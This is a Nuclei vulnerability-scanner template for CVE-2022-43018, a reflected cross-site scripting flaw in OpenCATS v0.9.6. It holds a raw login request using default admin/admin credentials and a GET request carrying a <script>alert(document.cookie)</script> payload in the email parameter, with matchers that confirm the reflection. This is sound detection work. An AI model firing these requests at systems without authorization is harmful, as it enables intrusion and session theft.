nuclei-templates/cves/2022/CVE-2022-43018.yaml

38 lines
1004 B
YAML
Raw Normal View History

2022-10-24 12:50:28 +00:00
id: CVE-2022-43018
info:
name: OpenCATS - Cross Site Scripting
author: arafatansari
severity: medium
description: |
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the email parameter in the Check Email function.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43018
tags: xss,cve,2022
requests:
- raw:
- |
POST /index.php?m=login&a=attemptLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=admin
- |
GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=<script>alert(document.cookie)</script> HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<script>alert(document.cookie)</script>'